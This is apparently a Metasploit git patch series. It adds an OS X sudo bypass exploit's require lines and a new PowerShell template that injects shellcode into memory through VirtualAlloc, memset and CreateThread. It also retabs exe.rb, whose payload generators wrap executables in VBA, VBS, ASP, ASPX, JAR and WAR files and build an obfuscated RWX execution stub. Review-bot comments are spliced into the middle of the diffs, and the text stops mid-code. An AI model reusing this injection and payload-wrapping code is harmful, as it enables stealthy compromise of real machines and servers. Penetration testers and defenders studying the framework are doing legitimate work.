From c7f05c06b3ab1e448488d7b8d56f562bea26b134 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 29 Aug 2013 12:57:45 -0500 Subject: [PATCH 01/13] Add the require boilerplate Fixes a bug that sometimes comes up with load order on this module. I know @jlee-r7 is working on a better overall solution but this should solve for the short term. Note, since the problem is practically machine-specific. @jlee-r7 suggested rm'ing all modules but the one under test. Doing that exposes the bug, and I've verified this fix in that way. --- modules/exploits/osx/local/sudo_password_bypass.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index ccea3a84f1..efc0420ab4 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -5,6 +5,11 @@ # # http://metasploit.com/ ## +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/exploit/exe' require 'shellwords' class Metasploit3 < Msf::Exploit::Local From 345bc7da03f6e121da0679b8c34c51d6849baf08 Mon Sep 17 00:00:00 2001 From: shellster Date: Thu, 29 Aug 2013 18:41:42 -0700 Subject: [PATCH 02/13] New Reflection Powershell Payload Adds Powershell payload which, unlike existing payloads does not drop any temporary files onto the target's computer. All needed methods are dynamically loaded via reflection. --- lib/msf/util/exe.rb | 27 +++++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 9d2555b80d..c7c8edb82f 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
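Review bot: The five added `require` lines carry no comment saying they are a load-order workaround, so the only record of why they exist is this commit message, and the next person tidying the header may drop them as redundant (the message itself says a framework-wide fix is in progress). Suggest a one-line comment above them, e.g. `# Explicit requires: the module fails to load in isolation without these (load-order workaround, see commit history)`. `require 'rex'` next to `require 'msf/core'` looks redundant, though that is inferred from the framework's usual load chain rather than visible here.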
@@ -865,7 +865,7 @@ require 'digest/sha1' return read_replace_script_template("to_exe.vba.template", hash_sub) end -def self.to_vba(framework,code,opts={}) + def self.to_vba(framework,code,opts={}) hash_sub = {} hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize @@ -987,6 +987,26 @@ def self.to_vba(framework,code,opts={}) return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(? Date: Thu, 29 Aug 2013 18:43:58 -0700 Subject: [PATCH 03/13] Added Template New template for previous commit. --- .../scripts/to_mem_pshreflection.ps1.template | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 data/templates/scripts/to_mem_pshreflection.ps1.template diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template new file mode 100644 index 0000000000..c56e66cabe --- /dev/null +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template 
@@ -0,0 +1,33 @@ +#Added a tweaked by shellster +#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 + +function %{func_get_proc_address} { + Param ($%{var_module}, $%{var_procedure}) + $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') + + return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure})) +} + +function %{func_get_delegate_type} { + Param ( + [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters}, + [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void] + ) + + $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed') + $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed') + + return $%{var_type_builder}.CreateType() +} + +%{shellcode} + +$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) 
([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40) +$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) + +for ($i=0;$i -le ($%{var_code}.Length-1);$i++) { + $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null +} + +[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null From 7e00e2aabad60a334e29c97c1d561d80595ea383 Mon Sep 17 00:00:00 2001 From: Tab Assassin Date: Thu, 5 Sep 2013 13:37:58 -0500 Subject: [PATCH 04/13] Retab changes for PR #2307 --- lib/msf/util/exe.rb | 732 ++++++++++++++++++++++---------------------- 1 file changed, 366 insertions(+), 366 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 011bbe3a34..50174272bc 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
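Review bot: The template reads `$%{var_code}.Length` and `$%{var_code}[$i]` but never declares `$%{var_code}`; it relies on the `%{shellcode}` substitution expanding to an assignment of that variable, a coupling nothing in the file states. Suggest either a comment at the `%{shellcode}` line, e.g. `# %{shellcode} must expand to an assignment of $%{var_code} as a byte array`, or an explicit typed assignment so the template is self-describing. Note also that comments in this template, including the two-line attribution header, are rendered verbatim into every generated script; the PowerSploit attribution is better recorded in the project's LICENSE file than emitted in output. The set of substitution keys the Ruby side must supply is likewise undocumented; a short header listing them would help whoever next edits `exe.rb`.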
@@ -865,208 +865,208 @@ require 'digest/sha1' return read_replace_script_template("to_exe.vba.template", hash_sub) end - def self.to_vba(framework,code,opts={}) - hash_sub = {} - hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_rwxpage] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_res] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_offset] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpThreadAttributes] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_dwStackSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpStartAddress] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpParameter] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_dwCreationFlags] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpThreadID] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpAddr] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_flAllocationType] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_flProtect] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lDest] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_Source] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_Length] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + def self.to_vba(framework,code,opts={}) + hash_sub = {} + hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_rwxpage] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_res] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_offset] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + 
hash_sub[:var_lpThreadAttributes] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_dwStackSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpStartAddress] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpParameter] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_dwCreationFlags] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpThreadID] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpAddr] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_flAllocationType] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_flProtect] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lDest] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_Source] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_Length] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - # put the shellcode bytes into an array - hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray]) + # put the shellcode bytes into an array + hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray]) - return read_replace_script_template("to_mem.vba.template", hash_sub) - end + return read_replace_script_template("to_mem.vba.template", hash_sub) + end - def self.to_exe_vbs(exes = '', opts={}) - delay = opts[:delay] || 5 - persist = opts[:persist] || false + def self.to_exe_vbs(exes = '', opts={}) + delay = opts[:delay] || 5 + persist = opts[:persist] || false - hash_sub = {} - hash_sub[:var_shellcode] = "" - hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small - hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_obj] = 
Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub = {} + hash_sub[:var_shellcode] = "" + hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small + hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) + hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) - hash_sub[:init] = "" + hash_sub[:init] = "" - if(persist) - hash_sub[:init] << "Do\r\n" - hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" - hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n" - hash_sub[:init] << "Loop\r\n" - else - hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" - end + if(persist) + hash_sub[:init] << "Do\r\n" + hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" + hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n" + hash_sub[:init] << "Loop\r\n" + else + hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" + end - return read_replace_script_template("to_exe.vbs.template", hash_sub) - end + return read_replace_script_template("to_exe.vbs.template", hash_sub) + end - def self.to_exe_asp(exes = '', opts={}) - hash_sub = {} - hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small - 
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) + def self.to_exe_asp(exes = '', opts={}) + hash_sub = {} + hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small + hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) + hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) - return read_replace_script_template("to_exe.asp.template", hash_sub) - end + return read_replace_script_template("to_exe.asp.template", hash_sub) + end - def self.to_exe_aspx(exes = '', opts={}) - hash_sub = {} - hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_filename] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) + def 
self.to_exe_aspx(exes = '', opts={}) + hash_sub = {} + hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_filename] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file]) + hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file]) - return read_replace_script_template("to_exe.aspx.template", hash_sub) - end + return read_replace_script_template("to_exe.aspx.template", hash_sub) + end - def self.to_win32pe_psh_net(framework, code, opts={}) - hash_sub = {} - hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) + def self.to_win32pe_psh_net(framework, code, opts={}) + hash_sub = {} + hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8) + 
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) + hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) - return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(? "metasploit.Payload" - config = "Spawn=#{spawn}\r\nExecutable=#{exe_name}\r\n" - zip.add_file("metasploit.dat", config) - zip.add_file(exe_name, exe) + # Creates a jar file that drops the provided +exe+ into a random file name + # in the system's temp dir and executes it. + # + # @see Msf::Payload::Java + # + # @return [Rex::Zip::Jar] + def self.to_jar(exe, opts={}) + spawn = opts[:spawn] || 2 + exe_name = Rex::Text.rand_text_alpha(8) + ".exe" + zip = Rex::Zip::Jar.new + paths = [ + [ "metasploit", "Payload.class" ], + ] + zip.add_files(paths, File.join(Msf::Config.data_directory, "java")) + zip.build_manifest :main_class => "metasploit.Payload" + config = "Spawn=#{spawn}\r\nExecutable=#{exe_name}\r\n" + zip.add_file("metasploit.dat", config) + zip.add_file(exe_name, exe) - zip - end + zip + end - # Creates a Web Archive (WAR) file from the provided jsp code. - # - # On Tomcat, WAR files will be deployed into a directory with the same name - # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the - # server is in a default configuration, deoployment will happen - # automatically. See - # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat - # documentation} for a description of how this works. - # - # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+ - # in the archive. This will be compiled by the victim servlet container - # (e.g., Tomcat) and act as the main function for the servlet. - # @param opts [Hash] - # @option opts :jsp_name [String] Name of the in the archive - # _without the .jsp extension_. Defaults to random. 
- # @option opts :app_name [String] Name of the app to put in the - # tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to - # random. - # @option opts :extra_files [Array] Additional files to add - # to the archive. First elment is filename, second is data - # - # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar} - # - # @return [String] - def self.to_war(jsp_raw, opts={}) - jsp_name = opts[:jsp_name] - jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) - app_name = opts[:app_name] - app_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) + # Creates a Web Archive (WAR) file from the provided jsp code. + # + # On Tomcat, WAR files will be deployed into a directory with the same name + # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the + # server is in a default configuration, deoployment will happen + # automatically. See + # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat + # documentation} for a description of how this works. + # + # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+ + # in the archive. This will be compiled by the victim servlet container + # (e.g., Tomcat) and act as the main function for the servlet. + # @param opts [Hash] + # @option opts :jsp_name [String] Name of the in the archive + # _without the .jsp extension_. Defaults to random. + # @option opts :app_name [String] Name of the app to put in the + # tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to + # random. + # @option opts :extra_files [Array] Additional files to add + # to the archive. 
First elment is filename, second is data + # + # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar} + # + # @return [String] + def self.to_war(jsp_raw, opts={}) + jsp_name = opts[:jsp_name] + jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) + app_name = opts[:app_name] + app_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) - meta_inf = [ 0xcafe, 0x0003 ].pack('Vv') - manifest = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" - web_xml = %q{ + meta_inf = [ 0xcafe, 0x0003 ].pack('Vv') + manifest = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" + web_xml = %q{ 
@@ -1586,232 +1586,232 @@ require 'digest/sha1' pop eax ; Skip popad ; Get our registers back ; sub esp, 44 ; Move stack pointer back past the handler - ^ + ^ - stub_final = %Q^ - get_payload: - call got_payload - payload: - ; Append an arbitrary payload here - ^ + stub_final = %Q^ + get_payload: + call got_payload + payload: + ; Append an arbitrary payload here + ^ - stub_alloc.gsub!('short', '') - stub_alloc.gsub!('byte', '') + stub_alloc.gsub!('short', '') + stub_alloc.gsub!('byte', '') - wrapper = "" - # regs = %W{eax ebx ecx edx esi edi ebp} + wrapper = "" + # regs = %W{eax ebx ecx edx esi edi ebp} - cnt_jmp = 0 - cnt_nop = 64 + cnt_jmp = 0 + cnt_nop = 64 - stub_alloc.each_line do |line| - line.gsub!(/;.*/, '') - line.strip! - next if line.empty? + stub_alloc.each_line do |line| + line.gsub!(/;.*/, '') + line.strip! + next if line.empty? - if (cnt_nop > 0 and rand(4) == 0) - wrapper << "nop\n" - cnt_nop -= 1 - end + if (cnt_nop > 0 and rand(4) == 0) + wrapper << "nop\n" + cnt_nop -= 1 + end - if(cnt_nop > 0 and rand(16) == 0) - cnt_nop -= 2 - cnt_jmp += 1 + if(cnt_nop > 0 and rand(16) == 0) + cnt_nop -= 2 + cnt_jmp += 1 - wrapper << "jmp autojump#{cnt_jmp}\n" - 1.upto(rand(8)+1) do - wrapper << "db 0x#{"%.2x" % rand(0x100)}\n" - cnt_nop -= 1 - end - wrapper << "autojump#{cnt_jmp}:\n" - end - wrapper << line + "\n" - end + wrapper << "jmp autojump#{cnt_jmp}\n" + 1.upto(rand(8)+1) do + wrapper << "db 0x#{"%.2x" % rand(0x100)}\n" + cnt_nop -= 1 + end + wrapper << "autojump#{cnt_jmp}:\n" + end + wrapper << line + "\n" + end - #someone who knows how to use metasm please explain the right way to do this. - wrapper << "db 0xe9\n db 0xFF\n db 0xFF\n db 0xFF\n db 0xFF\n" - wrapper << stub_final + #someone who knows how to use metasm please explain the right way to do this. 
+ wrapper << "db 0xe9\n db 0xFF\n db 0xFF\n db 0xFF\n db 0xFF\n" + wrapper << stub_final - enc = Metasm::Shellcode.assemble(Metasm::Ia32.new, wrapper).encoded - soff = enc.data.index("\xe9\xff\xff\xff\xff") + 1 - res = enc.data + code + enc = Metasm::Shellcode.assemble(Metasm::Ia32.new, wrapper).encoded + soff = enc.data.index("\xe9\xff\xff\xff\xff") + 1 + res = enc.data + code - if which_offset == 'start' - res[soff,4] = [block_offset - (soff + 4)].pack('V') - elsif which_offset == 'end' - res[soff,4] = [res.length - (soff + 4) + block_offset].pack('V') - else - raise RuntimeError, 'Blast! Msf::Util::EXE.rwx_exec_thread called with invalid offset!' - end - res - end + if which_offset == 'start' + res[soff,4] = [block_offset - (soff + 4)].pack('V') + elsif which_offset == 'end' + res[soff,4] = [res.length - (soff + 4) + block_offset].pack('V') + else + raise RuntimeError, 'Blast! Msf::Util::EXE.rwx_exec_thread called with invalid offset!' + end + res + end - # - # Generate an executable of a given format suitable for running on the - # architecture/platform pair. - # - # This routine is shared between msfencode, rpc, and payload modules (use - # ) - # - # @param framework [Framework] - # @param arch [String] Architecture for the target format; one of the ARCH_* - # constants - # @param plat [#index] platform - # @param code [String] The shellcode for the resulting executable to run - # @param fmt [String] One of the executable formats as defined in - # {.to_executable_fmt_formats} - # @param exeopts [Hash] Passed directly to the approrpriate method for - # generating an executable for the given +arch+/+plat+ pair. - # @return [String] An executable appropriate for the given - # architecture/platform pair. - # @return [nil] If the format is unrecognized or the arch and plat don't - # make sense together. 
- def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts) - # For backwards compatibility with the way this gets called when - # generating from Msf::Simple::Payload.generate_simple - if arch.kind_of? Array - output = nil - arch.each do |a| - output = to_executable_fmt(framework, a, plat, code, fmt, exeopts) - break if output - end - return output - end + # + # Generate an executable of a given format suitable for running on the + # architecture/platform pair. + # + # This routine is shared between msfencode, rpc, and payload modules (use + # ) + # + # @param framework [Framework] + # @param arch [String] Architecture for the target format; one of the ARCH_* + # constants + # @param plat [#index] platform + # @param code [String] The shellcode for the resulting executable to run + # @param fmt [String] One of the executable formats as defined in + # {.to_executable_fmt_formats} + # @param exeopts [Hash] Passed directly to the approrpriate method for + # generating an executable for the given +arch+/+plat+ pair. + # @return [String] An executable appropriate for the given + # architecture/platform pair. + # @return [nil] If the format is unrecognized or the arch and plat don't + # make sense together. + def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts) + # For backwards compatibility with the way this gets called when + # generating from Msf::Simple::Payload.generate_simple + if arch.kind_of? 
Array + output = nil + arch.each do |a| + output = to_executable_fmt(framework, a, plat, code, fmt, exeopts) + break if output + end + return output + end - case fmt - when 'asp' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_asp(exe, exeopts) + case fmt + when 'asp' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_asp(exe, exeopts) - when 'aspx' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_aspx(exe, exeopts) + when 'aspx' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_aspx(exe, exeopts) - when 'dll' - output = case arch - when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts) - when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts) - when ARCH_X64 then to_win64pe_dll(framework, code, exeopts) - end - when 'exe' - output = case arch - when ARCH_X86,nil then to_win32pe(framework, code, exeopts) - when ARCH_X86_64 then to_win64pe(framework, code, exeopts) - when ARCH_X64 then to_win64pe(framework, code, exeopts) - end + when 'dll' + output = case arch + when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts) + when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts) + when ARCH_X64 then to_win64pe_dll(framework, code, exeopts) + end + when 'exe' + output = case arch + when ARCH_X86,nil then to_win32pe(framework, code, exeopts) + when ARCH_X86_64 then to_win64pe(framework, code, exeopts) + when ARCH_X64 then to_win64pe(framework, code, exeopts) + end - when 'exe-service' - output = case arch - when ARCH_X86,nil then to_win32pe_service(framework, code, exeopts) - when ARCH_X86_64 then to_win64pe_service(framework, code, exeopts) - when ARCH_X64 then to_win64pe_service(framework, code, exeopts) - end + when 'exe-service' + output = case arch + when ARCH_X86,nil then to_win32pe_service(framework, code, exeopts) + 
when ARCH_X86_64 then to_win64pe_service(framework, code, exeopts) + when ARCH_X64 then to_win64pe_service(framework, code, exeopts) + end - when 'exe-small' - output = case arch - when ARCH_X86,nil then to_win32pe_old(framework, code, exeopts) - end + when 'exe-small' + output = case arch + when ARCH_X86,nil then to_win32pe_old(framework, code, exeopts) + end - when 'exe-only' - output = case arch - when ARCH_X86,nil then to_winpe_only(framework, code, exeopts, arch) - when ARCH_X86_64 then to_winpe_only(framework, code, exeopts, arch) - when ARCH_X64 then to_winpe_only(framework, code, exeopts, arch) - end + when 'exe-only' + output = case arch + when ARCH_X86,nil then to_winpe_only(framework, code, exeopts, arch) + when ARCH_X86_64 then to_winpe_only(framework, code, exeopts, arch) + when ARCH_X64 then to_winpe_only(framework, code, exeopts, arch) + end - when 'elf' - if (not plat or (plat.index(Msf::Module::Platform::Linux))) - output = case arch - when ARCH_X86,nil then to_linux_x86_elf(framework, code, exeopts) - when ARCH_X86_64 then to_linux_x64_elf(framework, code, exeopts) - when ARCH_X64 then to_linux_x64_elf(framework, code, exeopts) - when ARCH_ARMLE then to_linux_armle_elf(framework, code, exeopts) - when ARCH_MIPSBE then to_linux_mipsbe_elf(framework, code, exeopts) - when ARCH_MIPSLE then to_linux_mipsle_elf(framework, code, exeopts) - end - elsif(plat and (plat.index(Msf::Module::Platform::BSD))) - output = case arch - when ARCH_X86,nil then 